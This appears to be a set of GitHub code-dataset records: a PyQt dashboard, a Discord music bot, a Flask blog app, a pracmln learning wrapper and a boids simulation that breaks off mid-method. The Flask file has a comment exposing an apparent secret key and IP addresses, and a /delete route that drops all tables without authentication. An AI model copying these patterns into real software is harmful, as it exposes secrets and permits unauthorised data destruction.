PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QScrollBar, QVBoxLayout\nfrom PyQt5.QtCore import QTimer, Qt\nfrom pyqtgraph import BarGraphItem, plot, ScatterPlotItem, mkBrush\n\nfrom Automation_Functions.Chrono import Chrono\nfrom Automation_Functions.Sky import Sky\nfrom Automation_Functions.Inspire import Inspire\nfrom Automation_Functions.Stats import Stats\nfrom Automation_Functions.Notify import Notify\nfrom Gui.Main_Gui import Ui_MainWindow\n\n\n#? The Starting window state\nWINDOW_IS_MAXIMIZED = False\n\n\nclass Mainwindow(QMainWindow,Ui_MainWindow):\n def __init__(self):\n super(Mainwindow,self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self) \n self.ui.Pages.setCurrentWidget(self.ui.Home_Page)\n \n #? Grabbing needed data from module to display on gui\n Cron = Chrono() # Time data\n Date_Text = Cron.Get_Date()\n Xmas_Countdown_Text = Cron.Days_Till_Xmas()\n\n\n S = Sky() # Weather data\n Weather_Text, Temperature_Text, Feels_Like_Text = S.Fetch_Weather_Data()\n WeatherInfoDict = { 'Clear': {'img':'Gui/icons8-sun-96.png', 'Consensus': \"Wear what you want the weather isn't a problem.\"},\n 'Clouds': {'img':'Gui/icons8-clouds-96.png', 'Consensus': 'Pack a coat just in case the weather might turn for the worse.'},\n 'Drizzle': {'img':'Gui/icons8-rainy-weather-96.png', 'Consensus': 'Pack a coat just in case the weather might turn for the worse.'}, \n 'Rain': {'img':'Gui/icons8-rainy-weather-96.png', 'Consensus': 'Wear a coat, the weather is bad.'},\n 'Mist':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Fog':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Haze':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Snow':{'img':'Gui/icons8-snow-96.png', 'Consensus':'Wear a big coat it is freezing!'}}\n \n #! The order of the elif statements matter. \n # EX: if the <= 60 is first it will always return 60 even if its below 40\n if Temperature_Text >= 95:\n Temp_Consensus = \"Wear VERY light clothing, the weathers sweltering.\"\n \n elif Temperature_Text >= 80:\n Temp_Consensus = \"Wear light clothing, It's hot.\" \n \n elif Temperature_Text <= 45:\n Temp_Consensus = \"Wear VERY heavy clothing, It's freezing.\"\n\n elif Temperature_Text <= 60:\n Temp_Consensus = \"Wear heavier clothing, It's cold.\"\n \n else:\n Temp_Consensus = \"Wear what you want, The weather's fair.\"\n \n Inspiration = Inspire() # Quote data\n Quote, Author = Inspiration.Fetch_Inspiration()\n\n \n #? Fetching music files and putting it in list\n Music_Path = r'Music_Folder'\n self.Banger_Playlist = []\n for root, dirs, files in os.walk(Music_Path):\n for file in files:\n self.Banger_Playlist.append(os.path.join(root,file))\n \n \n Stat = Stats() # System data\n System_Info, Frequency, Battery, Total_Usage, Cpu_Usage = Stat.Check_System_Info()\n \n Notif = Notify()\n email_data, num_emails = Notif.Fetch_Inbox()\n # Using this will check all emails as read meaning wait until you know you are done \n \n workout_file = r'Save_Folder\\Workouts_Save_File.txt'\n note_file = r'Save_Folder\\Notes_Save_File.txt'\n #? Load text from save files\n workouts_text = self.Load_File_Text(workout_file)\n notes_text = self.Load_File_Text(note_file) \n\n self.ui.Workouts_text_edit.setText(workouts_text)\n self.ui.Notes_text_edit.setText(notes_text)\n self.ui.Date_Label.setText(Date_Text) #?Works on a different thread to not freeze gui\n Time_Text_Update = QTimer(self)\n Time_Text_Update.timeout.connect(lambda: self.ui.Time_Label.setText(Cron.Get_Time()))\n Time_Text_Update.start(1000)\n self.ui.Xmas_Countdown_Label.setText(f\"{Xmas_Countdown_Text} Days 'Till Christmas!\")\n\n self.ui.Weather_Label.setText(f\"Weather: {Weather_Text}\")\n self.ui.Temperature_Label.setText(f\"Temperature: {Temperature_Text}\")\n self.ui.Feels_Like_Label.setText(f\"Feels Like: {Feels_Like_Text}\")\n\n self.ui.Weather_Status_Pic.setPixmap(QPixmap(WeatherInfoDict[Weather_Text]['img']))\n self.ui.General_Consensus_Desc.setText(f\"\"\"Based on the weather you should: \n{WeatherInfoDict[Weather_Text]['Consensus']} \\nBased on the temperature you should:\n{Temp_Consensus} \"\"\") \n self.ui.Quote_and_Author_Label.setText(f\"{Author}: {Quote}\")\n \n self.ui.System_Label.setText(f\"System: {System_Info['System']}\")\n self.ui.Node_Label.setText(f\"Node Name: {System_Info['Node']}\")\n self.ui.Release_Label.setText(f\"Relase: {System_Info['Release']}\")\n self.ui.Machine_Label.setText(f\"Machine: {System_Info['Machine']}\")\n self.ui.Processor_Label.setText(f\"Processor: {System_Info['Processor']}\")\n self.ui.Physical_Cores_Label.setText(f\"Physical Cores: {System_Info['Physical_Cores']}\")\n self.ui.Total_Cores_Label.setText(f\"Total Cores: {System_Info['Total_Cores']}\")\n self.ui.Max_Freq_Label.setText(f\"Max Frequency: {Frequency['max_freq']}\")\n self.ui.Min_Freq_Label.setText(f\"Minimum Frequency: {Frequency['min_freq']}\")\n self.ui.Current_Freq_Label.setText(f\"Current Frequency: {Frequency['current_freq']}\")\n self.ui.Battery_Left_Label.setText(f\"Battery left: {Battery['battery_left']}%\")\n self.ui.Battery_Plugged_In_Label.setText(f\"Battery plugged in: {Battery['battery_plugged']}\")\n \n self.ui.Email_1_From.setText(f\"From: {email_data[0]['From']}\")\n self.ui.Email_2_From.setText(f\"From: {email_data[1]['From']}\")\n self.ui.Email_3_From.setText(f\"From: {email_data[2]['From']}\")\n self.ui.Email_4_From.setText(f\"From: {email_data[3]['From']}\")\n self.ui.Email_5_From.setText(f\"From: {email_data[4]['From']}\")\n self.ui.Email_1_Date.setText(f\"Date: {email_data[0]['Date']}\")\n self.ui.Email_2_Date.setText(f\"Date: {email_data[1]['Date']}\")\n self.ui.Email_3_Date.setText(f\"Date: {email_data[2]['Date']}\")\n self.ui.Email_4_Date.setText(f\"Date: {email_data[3]['Date']}\")\n self.ui.Email_5_Date.setText(f\"Date: {email_data[4]['Date']}\")\n self.ui.Email_1_Subject.setText(f\"Subject: {email_data[0]['Subject']}\")\n self.ui.Email_2_Subject.setText(f\"Subject: {email_data[1]['Subject']}\")\n self.ui.Email_3_Subject.setText(f\"Subject: {email_data[2]['Subject']}\")\n self.ui.Email_4_Subject.setText(f\"Subject: {email_data[3]['Subject']}\")\n self.ui.Email_5_Subject.setText(f\"Subject: {email_data[4]['Subject']}\")\n self.ui.Email_1_Msg.setText(f\"Message: {email_data[0]['Message']}\")\n self.ui.Email_2_Msg.setText(f\"Message: {email_data[1]['Message']}\")\n self.ui.Email_3_Msg.setText(f\"Message: {email_data[2]['Message']}\")\n self.ui.Email_4_Msg.setText(f\"Message: {email_data[3]['Message']}\")\n self.ui.Email_5_Msg.setText(f\"Message: {email_data[4]['Message']}\")\n \n \n #? Manully adding widgets that can't be added with QT designer\n Notes_text_edit_Scroll_Bar = QScrollBar(self)\n Notes_text_edit_Scroll_Bar.setStyleSheet(\"background : rgb(250,176,5);\")\n self.ui.Notes_text_edit.setVerticalScrollBar(Notes_text_edit_Scroll_Bar)\n \n GraphWidget = plot()\n x = [1, 2, 3, 4, 5, 6, 7, 8]\n Rounded_Cpu_Usage = []\n for item in Cpu_Usage:\n Rounded_Cpu_Usage.append(round(item))\n y1 = Rounded_Cpu_Usage\n BarGraph = BarGraphItem(x = x, height = y1, width = 0.5, brush = mkBrush(250,176,5))\n GraphWidget.setYRange(0,100)\n GraphWidget.setBackground(None)\n GraphWidget.addItem(BarGraph)\n HorizontalLayout = QVBoxLayout() \n HorizontalLayout.addWidget(self.ui.System_Stats_Plots_Title)\n HorizontalLayout.addWidget(GraphWidget)\n self.ui.System_Stats_Plots.setLayout(HorizontalLayout)\n self.ui.System_Stats_Plots_Title.setAlignment(Qt.AlignVCenter)\n \n #? Setting timer for Song function\n self.Song_Bar_Update = QTimer(self)\n self.Song_Bar_Update.timeout.connect(lambda: self.Play_Time())\n \n #? Setting functions for buttons\n self.ui.Home_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Home_Page))\n self.ui.Time_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Time_Reminders_Page))\n self.ui.Weather_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Weather_Page))\n self.ui.Inspirations_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Inspirations_Page))\n self.ui.System_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.System_Stats_Page))\n self.ui.Email_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Email_Page))\n self.ui.Close_Button.clicked.connect(lambda: self.close())\n self.ui.Maximize_Button.clicked.connect(lambda: self.Restore_or_Maximized())\n self.ui.Minimize_Button.clicked.connect(lambda: self.showMinimized())\n self.ui.Workout_Save_Button.clicked.connect(lambda: self.Save_Gui_Input(self.ui.Workouts_text_edit,\"Save_Folder/Workouts_Save_File.txt\"))\n self.ui.Notes_Save_Button.clicked.connect(lambda: self.Save_Gui_Input(self.ui.Notes_text_edit,\"Save_Folder/Notes_Save_File.txt\"))\n self.ui.Play_Button.clicked.connect(lambda: self.Play_Song())\n \n \n #? Save all text from file to save_data variable\n def Load_File_Text(self,file):\n with open(file,\"r\") as f:\n save_data = f.read()\n return save_data \n\n #? write text from widget to file \n def Save_Gui_Input(self,widget,file): \n contents = widget.toPlainText() \n with open(file,\"w\") as f:\n f.write(contents)\n \n def Restore_or_Maximized(self):\n global WINDOW_IS_MAXIMIZED\n win_status = WINDOW_IS_MAXIMIZED\n if win_status == False:\n WINDOW_IS_MAXIMIZED = True\n self.showMaximized()\n else:\n WINDOW_IS_MAXIMIZED = False\n self.showNormal()\n \n def Play_Song(self):\n if pygame.mixer.get_init():\n if self.ui.Play_Button.isChecked() == False:\n mixer.music.pause()\n self.Song_Bar_Update.stop()\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-play-32.png\"))\n \n elif self.ui.Play_Button.isChecked() == True:\n mixer.music.unpause()\n self.Song_Bar_Update.start(1000)\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-pause-32.png\"))\n \n else:\n pygame.init()\n pygame.mixer.music.set_endevent(pygame.USEREVENT)\n song = random.choice(self.Banger_Playlist)\n song_mutation = MP3(song)\n self.song_length = round(song_mutation.info.length)\n self.ui.Song_Progress_Bar.setMaximum(self.song_length)\n song_title = song.rstrip(\".mp3\").lstrip(\"Music_Folder\\\\\")\n self.ui.Song_Title_Label.setText(song_title)\n mixer.init()\n mixer.music.load(song)\n mixer.music.play()\n self.Song_Bar_Update.start(1000)\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-pause-32.png\"))\n \n def Play_Time(self):\n #? grab time in seconds rounded\n current_time = round(mixer.music.get_pos() / 1000)\n self.ui.Song_Progress_Bar.setValue(current_time)\n #? Check for music ending event and queue another song in responce \n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n self.Song_Bar_Update.stop()\n pygame.mixer.quit()\n self.Play_Song()\n self.Song_Bar_Update.start(1000)\n \ndef app():\n os.system('cls')\n app = QApplication(sys.argv)\n win = Mainwindow()\n \n #? Adjusting window settings\n win.setWindowTitle(\"D.E.A.T.H - Developer Environment Automation & Task Handler\")\n win.setWindowIcon(QIcon('Gui/icons8-headstone-100.png'))\n flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)\n win.setWindowFlags(flags)\n \n win.show()\n \n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n app()\n\n\n\n\n","repo_name":"ThatNerd404/D.E.A.T.H","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":13069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7747406490","text":"SA=0\nSD=0\nfor i in range(1,200):\n n=int(input(\"\"))\n if n==0:\n break\n elif n<0:\n SA=SA+1\n else:\n SD=SD+1\nprint(SD,\"so duong\")\nprint(SA,\"so am\")","repo_name":"quangthanhqt264/project","sub_path":"Chuong3/P2/CC3.11.py","file_name":"CC3.11.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4657427764","text":"from os.path import abspath\r\nfrom typing import List\r\nimport discord\r\nfrom discord import channel\r\nfrom discord import client\r\nfrom discord.voice_client import VoiceClient\r\nfrom discord import guild\r\nfrom discord import widget\r\nfrom discord.enums import Status\r\nfrom discord.errors import PrivilegedIntentsRequired\r\nfrom discord.ext import commands, tasks\r\nfrom urllib import parse, request\r\nfrom discord.utils import get\r\nimport re\r\nimport youtube_dl\r\nimport os\r\nimport shutil\r\nfrom random import choice\r\n\r\n# --------------------------------------------------------\r\nbot = commands.Bot(command_prefix='>', description=\"Esto es un bot\")\r\n# --------------------------------------------------------\r\n@bot.event\r\nasync def on_ready():\r\n # -------------------------------\r\n canal = channel.VoiceChannel\r\n if not canal: \r\n voz = get(bot.voice_clients,guild=guild)\r\n await voz.disconnect()\r\n # -------------------------------\r\n await bot.change_presence(activity= discord.Game(name=\"Ingresa >\"))\r\n print(\"BOT ONLINE\")\r\n# --------------------------------------------------------\r\n@tasks.loop(seconds=20)\r\nasync def status(ctx):\r\n await client.change_presence(activity=discord.Game(choice(status)))\r\n\r\n# --------------------------------------------------------\r\n@bot.command(name='ping',help='Latencia')\r\nasync def ping(ctx):\r\n await ctx.send(f'**pong!** Latencia: {round(bot.latency * 1000)}ms')\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def ven(ctx):\r\n canal = ctx.message.author.voice.channel\r\n if not canal:\r\n await ctx.send('No estas conectado a un canal de VOZ')\r\n return\r\n voz = get(bot.voice_clients,guild=ctx.guild)\r\n if voz and voz.is_connected():\r\n await voz.move_to(canal)\r\n else:\r\n voz= await canal.connect()\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def vete(ctx):\r\n canal = ctx.message.author.voice.channel\r\n voz = get(bot.voice_clients,guild=ctx.guild)\r\n await voz.disconnect()\r\n# --------------------------------------------------------\r\n@bot.event\r\nasync def on_member_join(member):\r\n channel = discord.utils.get(member.guild.channels, name='general')\r\n await channel.send(f'Bienvenido {member.mention}')\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True, name='play', help='Comando para musica')\r\nasync def play(ctx,*, search):\r\n # --------------------------------------------------------\r\n try:\r\n canal = ctx.message.author.voice.channel\r\n except:\r\n await ctx.send('No estas conectado a un canal de VOZ')\r\n return\r\n voz = get(bot.voice_clients,guild=ctx.guild)\r\n if voz and voz.is_connected():\r\n await voz.move_to(canal)\r\n else:\r\n voz= await canal.connect()\r\n # --------------------------------------------------------\r\n query_string= parse.urlencode({'search_query':search})\r\n html_content = request.urlopen('https://www.youtube.com/results?' + query_string)\r\n search_results = re.findall( r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n await ctx.send(\"https://www.youtube.com/watch?v=\"+search_results[0])\r\n# --------------------------------------------------------\r\n def revisar_lista():\r\n LR_en_Archivo=os.path.isdir(\"./Lista\")\r\n if LR_en_Archivo is True:\r\n DIR = os.path.abspath(os.path.realpath(\"Lista\"))\r\n tamaño = len(os.listdir(DIR))\r\n C_Activa=tamaño-1\r\n try:\r\n C_primera=os.listdir(DIR)[0]\r\n except:\r\n print(\"No hay canciones\\n\")\r\n listar.clear()\r\n return\r\n locatizacion_principal = os.path.dirname(os.path.realpath(__file__))\r\n C_localizacion = os.path.abspath(os.path.realpath(\"Lista\")+\"\\\\\"+C_primera)\r\n if tamaño !=0:\r\n print(\"Cancion Lista, Se reproducira en breve\")\r\n print(f\"Canciones en la Lista: {C_Activa}\")\r\n C_Encontrada= os.path.isfile(\"cancion.mp3\")\r\n if C_Encontrada:\r\n os.remove(\"cancion.mp3\")\r\n shutil.move(C_localizacion,locatizacion_principal)\r\n for file in os.listdir(\"./\"):\r\n if file.endswith(\".mp3\"):\r\n os.rename(file,'cancion.mp3')\r\n voice.play(discord.FFmpegPCMAudio(\"cancion.mp3\"),after=lambda e:revisar_lista())\r\n voice.source=discord.PCMVolumeTransformer(voice.source)\r\n voice.source.volume= 20\r\n else:\r\n listar.clear()\r\n return\r\n else:\r\n listar.clear()\r\n print(\"No se agrego la cancion a la lista\")\r\n \r\n if not canal: \r\n canal = ctx.message.author.voice.channel\r\n voz = get(bot.voice_clients,guild=ctx.guild)\r\n await voz.disconnect()\r\n# --------------------------------------------------------\r\n C_Encontrada= os.path.isfile(\"cancion.mp3\")\r\n try:\r\n if C_Encontrada:\r\n os.remove(\"cancion.mp3\")\r\n listar.clear()\r\n print(\"removido archivo antiguo\")\r\n except PermissionError:\r\n print(\"se ha intentado eliminar un archivo pero este se encuentra Reproduccion\")\r\n await ctx.send(\"ERROR: Cancion aun se esta reproduciendo\")\r\n return\r\n LR_en_Archivo = os.path.isdir(\"./Lista\")\r\n try:\r\n LR_Carpeta=\"./Lista\"\r\n if LR_en_Archivo is True:\r\n print(\"Removida la carpeta Antigua\")\r\n shutil.rmtree(LR_Carpeta)\r\n except:\r\n print(\"No hay carpeta\")\r\n await ctx.send(\"En breve se reproducira la cancion\")\r\n voice=get(bot.voice_clients,guild=ctx.guild)\r\n ydl_op={\r\n 'format':'bestaudio/best',\r\n 'quiet': True,\r\n 'postprocessors':[{\r\n 'key':'FFmpegExtractAudio',\r\n 'preferredcodec':'mp3',\r\n 'preferredquality':'192', \r\n }],\r\n }\r\n with youtube_dl.YoutubeDL(ydl_op)as ydl:\r\n print(\"Descargando cancion\\n\")\r\n link= search_results[0]\r\n ydl.download([link])\r\n for file in os.listdir(\"./\"):\r\n if file.endswith(\".mp3\"):\r\n name2 = file\r\n print(f\"Rembrando archivo: {file}\\n\")\r\n os.rename(file,\"cancion.mp3\")\r\n voz=get(bot.voice_clients,guild=ctx.guild)\r\n voz.play(discord.FFmpegPCMAudio(\"cancion.mp3\"), after=lambda e: revisar_lista())\r\n voz.source=discord.PCMVolumeTransformer(voz.source)\r\n voz.source.volume= 20\r\n\r\n nombre= name2.rsplit(\"-\",2)\r\n await ctx.send(f\"Reproduciendo: {nombre[0]}\\n\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def awanta(ctx):\r\n voz=get(bot.voice_clients,guild=ctx.guild)\r\n\r\n if voz and voz.is_playing():\r\n print(\"Musica Pausada\")\r\n voz.pause()\r\n await ctx.send(\"Musica Pausada\")\r\n else:\r\n print(\"No se esta reproduciendo, Pausa erronea\")\r\n await ctx.send(\"No se esta reproduciendo, Pausa erronea\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def continua(ctx):\r\n voz=get(bot.voice_clients,guild=ctx.guild)\r\n\r\n if voz and voz.is_paused():\r\n print(\"Reproduciendo nuevamente\")\r\n voz.resume()\r\n await ctx.send(\"Reproduciendo Nuevamente\")\r\n else:\r\n print(\"No se escuentra Pausada ninguna musica\")\r\n await ctx.send(\"No se escuentra Pausada ninguna musica\")\r\n# --------------------------------------------------------\r\n@bot.command(pass_context=True)\r\nasync def stop(ctx):\r\n voz=get(bot.voice_clients,guild=ctx.guild)\r\n if voz and voz.is_playing():\r\n print(\"Musica detenida\")\r\n voz.stop()\r\n await ctx.send(\"Musica Detenida\")\r\n else:\r\n print(\"No se esta reproduciendo\")\r\n await ctx.send(\"Musica Detenida\")\r\n# --------------------------------------------------------\r\n\r\n# --------------------------------------------------------\r\nlistar={}\r\n@bot.command(pass_context=True)\r\nasync def lista(ctx,*,search):\r\n # --------------------------------------------------------\r\n query_string= parse.urlencode({'search_query':search})\r\n html_content = request.urlopen('https://www.youtube.com/results?' + query_string)\r\n search_results = re.findall( r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n # await ctx.send(\"https://www.youtube.com/watch?v=\"+search_results[0])\r\n # --------------------------------------------------------\r\n cancion_lista = os.path.isdir(\"./Lista\")\r\n if cancion_lista is False:\r\n os.mkdir(\"Lista\")\r\n DIR = os.path.abspath(os.path.realpath(\"Lista\"))\r\n Lista_num = len(os.listdir(DIR))\r\n Lista_num+=1\r\n AgragarLista=True\r\n while AgragarLista:\r\n if Lista_num in listar:\r\n Lista_num=+1\r\n else:\r\n AgragarLista = False\r\n listar[Lista_num]= Lista_num\r\n\r\n Lista_path=os.path.abspath(os.path.realpath(\"Lista\") + f\"\\cancion{Lista_num}.%(ext)s\")\r\n \r\n ydl_op = {\r\n 'format': 'bestaudio/best',\r\n 'quiet':True,\r\n 'outtmpl':Lista_path,\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec':'mp3',\r\n 'preferredquality':'192',\r\n }],\r\n }\r\n with youtube_dl.YoutubeDL(ydl_op) as ydl:\r\n print(\"Descargar cancion\")\r\n link= search_results[0]\r\n ydl.download([link])\r\n await ctx.send(\"Añadida la cancion nro \"+str(Lista_num)+\" a la lista de Reproduccion\")\r\n print(\"Cancion añadida\")\r\n# --------------------------------------------------------\r\nbot.run('TOKEN')\r\n\r\n\r\n","repo_name":"hramses1/Bot-Discord","sub_path":"Bot-Discord-Hramses/discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22936636747","text":"from flask import Flask, redirect, url_for\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\n\nfrom forms import PostsForm\napp = Flask(__name__)\n\n# 2a02:c7f:8ee9:1800:95f3:9430:14e8:cf52 94.11.43.81 my IP\n# 3a617fb3dde7803d7e4513616c2973ee secret key\n\n\n# make more secure\napp.config['SECRET_KEY'] = environ.get('SECRET_KEY')\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://' + \\\n environ.get('MYSQL_USER') + \\\n ':' + \\\n environ.get('MYSQL_PASSWORD') + \\\n '@' + \\\n environ.get('MYSQL_HOST') + \\\n ':' + \\\n environ.get('MYSQL_PORT') + \\\n '/' + \\\n environ.get('MYSQL_DB_NAME')\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Posts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n f_name = db.Column(db.String(30), nullable=False)\n l_name = db.Column(db.String(30), nullable=False)\n title = db.Column(db.String(100), nullable=False)\n content = db.Column(db.String(300), nullable=False, unique=True)\n\n def __repr__(self):\n return \"\".join(\n [\n 'Title: ' + self.title + '\\n'\n 'First Name: ' + self.f_name + ' ' + self.l_name + '\\n'\n 'Content: ' + self.content\n ]\n )\n\n@app.route('/')\n@app.route('/home')\ndef home():\n post_data = Posts.query.all()\n return render_template('homepage.html', title='Homepage', posts=post_data)\n\n\n@app.route('/about')\ndef about():\n return render_template('aboutpage.html', title='About')\n\n\n@app.route('/create', methods=['GET', 'POST'])\ndef create():\n form = PostsForm()\n if form.validate_on_submit():\n post_data = Posts(\n f_name=form.f_name.data,\n l_name=form.l_name.data,\n title=form.title.data,\n content=form.content.data\n )\n db.session.add(post_data)\n db.session.commit()\n return redirect(url_for('home'))\n else:\n return render_template('create.html', title='Create a thing', form=form)\n\n# GET - which displays data\n# POST - which sends data from website to application\n# DELETE - deletes some data\n# Insert - sends data, but more used for updating\n\n# @app.route('/create')\n# def create():\n# db.create_all()\n# post = Posts(f_name='David', l_name='McCartney', title='What teh duhh', content='blah blah blah')\n# post1 = Posts(f_name='Bavid', l_name='Cartney', title='What teh geez', content='whooh blah blah')\n# db.session.add(post)\n# db.session.add(post1)\n# db.session.commit()\n# return 'Added the table and populated it with some records'\n\n\n@app.route('/delete')\ndef delete():\n db.drop_all()\n # db.session.query(Posts).delete()\n db.session.commit()\n return 'Everything is gone! Whoops!'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"DavidQATraining/firstFlaskApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30283220432","text":"import os\nimport random\n\nfrom learn import LearningModelInterface\n# from opensource.pracmln.pracmln_patched.mln.database import Database as DB\nfrom .state_inference import Database as DB\nfrom .state_inference import StateInfrence\nfrom collections import defaultdict\nfrom .utils import load_dbs\n\n\nclass PracmlnLearningModel(LearningModelInterface):\n def __init__(\n self,\n mln_database_path: str,\n domain_p_decs_path: str,\n max_databases=25,\n ):\n # load dataset\n databases = load_dbs(mln_database_path)\n random.shuffle(databases)\n databases = databases[:max_databases]\n self.dataset = [DB.parse_db(db) for db in databases]\n\n # initiate pracmln learner\n self.state_inference: StateInfrence = StateInfrence(\n os.path.normpath(os.path.join(os.getcwd(), domain_p_decs_path))\n )\n\n def train(self):\n # track how many databases were added for each action being learnt\n opt_tracker = defaultdict(int)\n for i, d in enumerate(self.dataset):\n # systematic noise on move function (to be moved to preprocessing)\n if d.action.name == \"move\":\n if opt_tracker[d.action.name] >= 1:\n # d.noise(0.3)\n d.sys_noise(\"conn(v0,v1,0)\", 0.5)\n # pass data through Markov Logic Network\n self.state_inference.process_database(d)\n opt_tracker[d.action.name] += 1\n # write data for metrics, remove for speed & space use reduction\n self.state_inference.save_data_for_graphing()\n # plot learning confidence results.\n self.state_inference.plot()\n","repo_name":"Occy88/action_model_reconstruction_framework","sub_path":"learn/pracmln_learning_model/pracmln_learning_model.py","file_name":"pracmln_learning_model.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21276643130","text":"class Boid:\n \n def __init__(self, boids, x, y, z):\n \n self.boids = boids\n self.flock = boids\n \n self.x = 1.0 * x\n self.y = 1.0 * y\n self.z = 1.0 * z\n \n self.vx = 0\n self.vy = 0\n self.vz = 0\n \n self.is_perching = False\n self._perch_t = 0\n\t \n \n def copy(self):\n \n b = Boid(self.boids, self.x, self.y, self.z)\n b.vx = self.vx\n b.vy = self.vy\n b.vz = self.vz\n b.is_perching = self.is_perching\n b._perch_t = self._perch_t\n \n return b\n \n def cohesion(self, d=100):\n \n \"\"\"Boids move towards the flock's centre of mass.\n\n The centre of mass is the average position of all boids, not\n including itself (the \"perceived centre\").\n \"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n vx, vy, vz = vx+b.x, vy+b.y, vz+b.z\n \n n = len(self.boids)-1\n vx, vy, vz = vx/n, vy/n, vz/n\n \n return (vx-self.x)/d, (vy-self.y)/d, (vz-self.z)/d\n \n def separation(self, r=10):\n \n \"\"\"Boids keep a small distance from other boids.\n\n Ensures that boids don't collide into each other, in a smoothly\n accelerated motion.\n \"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n if abs(self.x-b.x) < r: vx += (self.x-b.x)\n if abs(self.y-b.y) < r: vy += (self.y-b.y)\n if abs(self.z-b.z) < r: vz += (self.z-b.z)\n \n return vx, vy, vz\n \n def alignment(self, d=5):\n \n \"\"\"Boids match velocity with other boids.\"\"\"\n \n vx = vy = vz = 0\n for b in self.boids:\n if b != self:\n vx, vy, vz = vx+b.vx, vy+b.vy, vz+b.vz\n \n n = len(self.boids)-1\n vx, vy, vz = vx/n, vy/n, vz/n\n \n return (vx-self.vx)/d, (vy-self.vy)/d, (vz-self.vz)/d\n \n def limit(self, max=30):\n \n \"\"\"The speed limit for a boid.\n\n Boids can momentarily go very fast, something that is impossible\n for real animals.\n \"\"\"\n \n if abs(self.vx) > max: \n self.vx = self.vx/abs(self.vx)*max\n if abs(self.vy) > max: \n self.vy = self.vy/abs(self.vy)*max\n if abs(self.vz) > max: \n self.vz = self.vz/abs(self.vz)*max\n \n def _angle(self):\n \n \"\"\"Returns the angle towards which the boid is steering.\"\"\"\n \n from math import atan, pi, degrees\n a = degrees(atan(self.vy/self.vx)) + 360\n if self.vx < 0: a += 180\n\n return a\n \n angle = property(_angle)\n \n def goal(self, x, y, z, d=50.0):\n \n \"\"\"Tendency towards a particular place.\"\"\"\n \n return (x-self.x)/d, (y-self.y)/d, (z-self.z)/d\n \nclass Boids(list):\n \n def __init__(self, n, x, y, w, h):\n \n for i in range(n):\n dx = _ctx.random(w)\n dy = _ctx.random(h)\n z = _ctx.random(200)\n b = Boid(self, x+dx, y+dy, z)\n self.append(b)\n \n self.x = x\n self.y = y\n self.w = w\n self.h = h\n \n self.scattered = False\n self._scatter = 0.005\n self._scatter_t = 50\n self._scatter_i = 0\n \n self._perch = 1.0 # Lower this number to simulate diving.\n self._perch_y = _ctx.HEIGHT\n self._perch_t = lambda:25+_ctx.random(50)\n \n self.has_goal = False\n self.flee = False\n self._gx = 0\n self._gy = 0\n self._gz = 0\n\t\n \n def copy(self):\n \n boids = Boids(0, self.x, self.y, self.w, self.h)\n \n boids.scattered = self.scattered\n boids._scatter = self._scatter\n boids._scatter_t = self._scatter_t\n boids._scatter_i = self._scatter_i\n \n boids._perch = self._perch\n boids._perch_y = self._perch_y\n boids._perch_t = self._perch_t\n \n boids.has_goal = self.has_goal\n boids.flee = self.flee\n boids._gx = self._gx\n boids._gy = self._gy\n boids._gz = self._gz\n \n for boid in self:\n boids.append(boid.copy())\n \n return boids\n\n def scatter(self, chance=0.005, frames=50):\n \n self._scatter = chance\n self._scatter_t = frames\n \n def noscatter(self):\n \n self._scatter = 0.0\n \n def perch(self, ground=None, chance=1.0, frames=lambda:25+_ctx.random(50)):\n \n if ground == None:\n ground = _ctx.HEIGHT\n \n self._perch = chance\n self._perch_y = ground\n self._perch_t = frames\n \n def noperch(self):\n \n self._perch = 